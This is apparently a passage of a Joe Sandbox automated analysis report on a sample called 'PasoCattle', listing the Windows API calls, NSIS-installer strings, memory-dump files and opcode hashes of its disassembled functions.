                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                          APIs
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902
                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                          • String ID: Version
                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                          Strings
                                                                                                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
